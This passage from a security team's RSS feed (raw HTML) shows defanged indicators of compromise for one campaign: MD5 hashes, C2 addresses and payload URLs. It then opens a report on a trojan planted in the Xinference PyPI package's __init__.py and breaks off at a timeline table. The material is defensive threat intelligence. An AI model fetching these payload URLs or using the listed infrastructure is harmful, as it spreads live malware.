&#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgv8u"><span textstyle="" style="font-weight: bold;">MD5：</span></span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg23p6">397591dd098f9240684f9a999e38eb12  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1wm8">23f5e51bf6d540553aa88c48480450a8  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgb55">d286d439393bde76b734bd3406628d47 </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapglwo">ab17051365bb75c2fd4637b0d560a312  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgp4g">e7c535d2ef05405870923204dd5829d6  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg2x1">b33c8f6a2bebe8d6a41bff851a45f35f  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgi4s">13209c997f62c6c6934bc3f20a6adbd8  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg14gd">017eb0e90e70a48e3b57f9c315e280f5  </span></p><p style="margin: 16px 0px 8px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1o3d"><span textstyle="" style="font-weight: bold;">C2&amp;URL:</span></span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg231n">89.46.236[.]152:443</span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgnvf"><a href="https://domainnamevalidator[.]com/uploads/taskhost" target="_blank">https://domainnamevalidator[.]com/uploads/taskhost</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgb6u">213.111.185[.]78:443 </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgd9t"><a href="https://domainregistationcheck[.]com/uploads/b1" target="_blank">https://domainregistationcheck[.]com/uploads/b1</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapge09"><a href="https://151.236.4[.]164:5010" target="_blank">https://151.236.4[.]164:5010</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1i8k">getserviceupdates[.]com </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1qdp"><a href="http://46.30.191[.]221/host.txt" target="_blank">http://46.30.191[.]221/host.txt</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg16xr"><a href="http://46.30.191[.]221/MsEdge" target="_blank">http://46.30.191[.]221/MsEdge</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgrbr"><a href="http://46.30.191[.]221/taskhost" target="_blank">http://46.30.191[.]221/taskhost</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapglmb"><a href="http://46.30.191[.]221/appv1.exe" target="_blank">http://46.30.191[.]221/appv1.exe</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1875"><a href="http://46.30.191[.]221/input.txt" target="_blank">http://46.30.191[.]221/input.txt</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg2su"><a href="http://46.30.191[.]221/ppersis.py" target="_blank">http://46.30.191[.]221/ppersis.py</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg1a3m"><a href="http://46.30.191[.]221/pw.exe" target="_blank">http://46.30.191[.]221/pw.exe</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg10qn"><a href="http://46.30.191[.]221:8080/get-pip.py" target="_blank">http://46.30.191[.]221:8080/get-pip.py</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgya7"><a href="http://46.30.191[.]221/cf.py" target="_blank">http://46.30.191[.]221/cf.py</a> </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapgmbr"><a href="http://46.30.191[.]221/ppp.py" target="_blank">http://46.30.191[.]221/ppp.py</a>  </span></p><p style="margin: 8px 0px;text-indent: 0px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 15px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="mo19kapg21i6">89.31.121[.]220:443                                                                                                            </span></p><div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="96036"><div style="margin:10px auto;"><div data-autoskip="1" style="font-size: 14px;text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: #3e3e3e;"><p hm_fix="208:559"><span style="color: rgb(190, 25, 31);font-size: 15px;"><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360</span></span></strong><strong style="letter-spacing: 0.544px;caret-color: red;max-width: 100%;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="max-width: 100%;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">高级威胁研究院</span></span></strong></span></p><p style="margin: 0px;padding: 0px;text-align: justify;max-width: 100%;min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:-apple-system-font, BlinkMacSystemFont, Arial, sans-serif;"><span style="margin: 0px;padding: 0px;max-width: 100%;color: rgb(136, 136, 136);font-size: 15px;box-sizing: border-box !important;overflow-wrap: break-word !important;font-family:微软雅黑, sans-serif;"><span leaf="">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div><o:page></o:page></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7065bf7d&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508516%26idx%3D1%26sn%3Da869f67294b5777615ad597c3730105e">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 17:13:00 +0800</pubDate>
    </item>
    <item>
      <title>Xinference 供应链安全事件调查与分析报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508515&amp;idx=1&amp;sn=82169bea927184c000de87d008eee7fa</link>
      <description></description>
      <content:encoded><![CDATA[<p><span>高级威胁研究院</span> <span>2026-04-27 15:08</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=024061dd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FEmmib7pWXrXILibe2rf05rKm6bt9c1JNE8jCVia9ibuQUzURDIF7hPVNKUkn6icxQLphLibibO1PtZeekSgN2LJSUWYaZjW13faRBw7uiaYCbMPr0Po%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="mogm720m1gmj" data-pm-slice="0 0 []"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding: 0px 8px 0px 13px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="width: 24px;align-self: flex-start;z-index: 1;margin-left: 10px;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.20833333333333334" data-w="48" style="display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=456d823d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FQkjvmbC1CD0zJ9hBlrElSv4ZqETGn3otgH8VHW1QuoOec3JMAbUyr0iaurJy4DPHBwUsDXiadJ3aha4CvJwyYVew%2F640"/></p><div style="background: rgb(235, 175, 166);" data-mid="" mpa-from-tpl="t"><div style="background: #FFFFFF;border: 1px solid #333333;padding: 14px 12px;transform: translate(-4px, -4px);" data-mid="" mpa-from-tpl="t" data-mpa-action-id="mogm7zf423dz" data-pm-slice="0 0 []"><p style="font-size: 14px;font-family: PingFangSC-Regular, &#34;PingFang SC&#34;;color: rgb(51, 51, 51);line-height: 1.6em;letter-spacing: 1px;margin-top: 8px;margin-bottom: 8px;text-indent: 2em;text-align: justify;" data-mid=""><span mpa-font-style="mogm7m131c1t" style="font-size: 16px;"><span mpa-font-style="mogm7o6212fv" style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span mpa-font-style="mogm7zei1rzy" style="font-size: 17px;"><span leaf="">Xinference</span><span style=""><span leaf="">（</span><span lang="EN-US"><span leaf="">Xorbits Inference</span></span><span leaf="">）是一款流行的开源</span><span lang="EN-US"><span leaf=""> AI </span></span><span leaf="">模型部署与服务框架，支持开发者通过极简命令快速部署大语言、语音及多模态模型。它对外提供兼容</span><span lang="EN-US"><span leaf=""> OpenAI </span></span><span leaf="">的</span><span lang="EN-US"><span leaf=""> API</span></span><span leaf="">，并深度集成于</span><span lang="EN-US"><span leaf="">Dify</span></span><span leaf="">、</span><span lang="EN-US"><span leaf="">LangChain </span></span><span leaf="">等主流</span><span lang="EN-US"><span leaf=""> AI </span></span><span leaf="">生态工具链中。由于其核心用户多为掌握企业核心代码、高权限云凭证与高算力资源的</span><span lang="EN-US"><span leaf=""> AI </span></span><span leaf="">研发人员，因此极易成为黑客实施软件供应链投毒的高价值目标。</span></span></span></span></span></p></div></div></div></div></div><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-weight: bold;">2026年4月22日，Xinference 官方 PyPI 发布包被披露遭遇供应链投毒攻击。攻击者在 V2.6.0、V2.6.1 及V2.6.2 三个版本的核心初始化文件 `__init__.py` 中植入了窃密木马。</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">恶意样本中留有 &#34;# hacked by teampcp&#34; 文本标记，表面指向近期活跃于开源供应链攻击的 TeamPCP 组织，但该组织随后公开否认参与此次事件，存在假旗操作的可能性。目前归属研判尚未形成确定性结论，我们将持续跟踪关注。</span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="mognljmn1r3b"><div style="display: flex;align-items: center;justify-content: center;" data-mid="" mpa-from-tpl="t"><div style="display: flex;flex-direction: column;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t"><p style="color: #B5230B;padding: 0 8px;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 22px;font-style: normal;font-weight: 600;line-height: 44px;letter-spacing: 1.32px;border-radius: 6px;background: #FFEAAE;" data-mid="" mpa-from-tpl="t"><span leaf="" mpa-font-style="mognlncvksl" style="font-size: 18px;" data-mpa-action-id="mognlndfcp0" data-pm-slice="0 0 []">01</span></p><p style="width: 36px;margin-top: 8px;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.25675675675675674" data-w="74" style="display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=c92a70d5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FpALNiaJfvo0JYIUacERibiaqVWp28U3y2T3pVQNg7t7fEmUkOHj1MRKlht1cQBpzoSMKK3u5nXvl8qPEuRpWiacWy3I0B66bn686GQq5SD0coCs%2F640%3Ffrom%3Dappmsg"/></p></div><div style="display: flex;justify-content: flex-end;align-items: end;margin-top: -5px;padding-bottom: 8px;border-bottom: 1px solid #B5230B;" data-mid="" mpa-from-tpl="t"><p style="width: fit-content;color: #FFF;text-align: justify;font-family: &#34;PingFang SC&#34;;font-size: 18px;font-style: normal;font-weight: 600;line-height: 36px;letter-spacing: 1.08px;border-radius: 4px;background: #B5230B;padding: 2px 16px;margin-left: 8px;margin-right: 19px;" data-mid="" mpa-from-tpl="t"><span leaf="">攻击活动分析</span></p><p data-mid="" mpa-from-tpl="t" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.8367346938775511" data-w="49" style="width: 20px;transform: translateY(-2px);display: block;background-color: transparent;" src="https://wechat2rss.xlab.app/img-proxy/?k=017f44fe&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FF9Qia9yBKiatjeBG0kXBR5Cd9AyUcayibLOPlp9iaY6YeUYBoLZcTaxbd1AyxyefO5x7GCicw0ESwHZRJ1mVib8hic1X63a7fhsibcGicibhgNOT8SMbM%2F640%3Ffrom%3Dappmsg"/></p></div></div></div><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt810ap">2026年4月22日，Xinference 官方软件包被披露遭遇供应链投毒事件。攻击者将恶意载荷植入包内 __init__.py 文件，通过篡改初始化逻辑实现恶意代码随安装或导入过程被触发。随后，Xinference 项目开发人员在 GitHub Issues 回复中确认了该安全事件，进一步证实官方发布包在特定版本范围内已受到污染。</span><o:page></o:page></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-ratio="0.6327160493827161" style="width: 553.74px;height: 350.34px;" data-w="972" src="https://wechat2rss.xlab.app/img-proxy/?k=20deb923&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXLTN5bP8F8mvYYLLCY5bhp8Ax7DGT4mmgvNr9HmTHYay7PJHguFHNqYkwyyU1qnN6SX7oTibL7bqO58THhUbUJsBEUhjv8n0rmA%2F640%3Fwx_fmt%3Dpng"/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/><img class="rich_pages wxw-img" data-src=""/></span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81hxr"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">图1 Github中Issues回复示例</span></span></p><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt81pvr">为进一步还原攻击活动时间线，我们对 xinference-2.6.0.tar.gz、xinference-2.6.1.tar.gz 与 xinference-2.6.2.tar.gz 三个受影响版本压缩包进行了取样分析，并提取了归档文件内相关文件的最近修改时间（mtime, UTC）。分析结果显示，<span textstyle="" style="font-weight: bold;">攻击者最早在 2026年4月21日 20:08:49 UTC 已完成对恶意文件的植入</span>。</span></p><p style="text-indent: 0px;text-align: center;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.034em;font-style: normal;font-weight: normal;" mpa-font-style="moglxmt8zeq"><span textstyle="" style="color: rgb(136, 136, 136);font-style: italic;">表1 三个版本文件的最近修改时间</span></span></p><div><div><div><div><div><p><table style="width:574px;"><tbody><tr><td data-colwidth="203"><p><span style="font-size: 15px;"><span leaf="">MD5</span></span></p></td><td data-colwidth="164"><p><span style="font-size: 15px;"><span leaf="">文件名</span></span></p></td><td data-colwidth="207"><p data-mpa-action-id="mogmhhcvdru"><span style="font-size: 15px;"><span style="font-family: DengXian;" data-pm-slice="0 0 []"><span leaf="">最后修改时间</span><span lang="EN-US"><span leaf="">(mtime UTC)</span></span></span></span></p></td></tr><tr><td data-colwidth="203"><p><span style="font-size: 15px;"><span 